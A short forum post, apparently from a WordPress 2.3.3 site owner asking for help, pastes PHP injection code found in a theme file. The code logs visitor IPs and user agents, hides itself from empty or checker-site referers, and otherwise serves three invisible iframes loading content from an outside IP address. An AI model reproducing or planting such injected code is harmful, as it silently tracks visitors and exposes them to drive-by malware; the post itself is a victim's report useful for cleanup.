2.3.3 Hacked

I just noticed this in my wp-gm file. I landed on a page from Google and get a nasty surprise. Any help would be appreciated.

<?
echo “<!– counter –>”;
$dat_file=”images/z1.txt”;
$log_file=”images/z2.txt”;
$f=fopen($dat_file,”r+”);
$count=fgets($f,100);
fclose($f);
$count=ereg_replace(“\n”,””,$count);
$count++;
$f=fopen($dat_file,”w”);
fputs($f,”$count”);
fclose($f);
?>
<?
$f=fopen($log_file,”a+”);
$ip=getenv(“REMOTE_ADDR”);
$ag=getenv(“HTTP_USER_AGENT”);
$host=getenv(“HTTP_REFERER”);
$data=date(“d-m-Y”);
$time=date(“H:i:s”);
fputs($f,”$count#$data#$time#$ip#$ag#$host#\n”);
fclose($f);
?>
<?
$expl=1;
$referer = getenv( “HTTP_REFERER” );

if (strstr($referer, “adbrite”))
{
$expl=2;
}

if (strstr($referer, “copyscape.com”))
{
$expl=2;
}

$rlen=strlen($referer);
if ($rlen==0)
{
$expl=2;
}
?>
<?
if($expl!=2)
{
echo “<iframe src=\”https://64.86.135.13/~craifain/fonts/.mp/index.php\” width=0 height=0></iframe>”;
echo “<iframe src=\”https://64.86.135.13/~craifain/fonts/.ip\” width=0 height=0></iframe>”;
echo “<iframe src=\”https://64.86.135.13/~craifain/fonts/.xc/top/\” width=0 height=0></iframe>”;
}
?>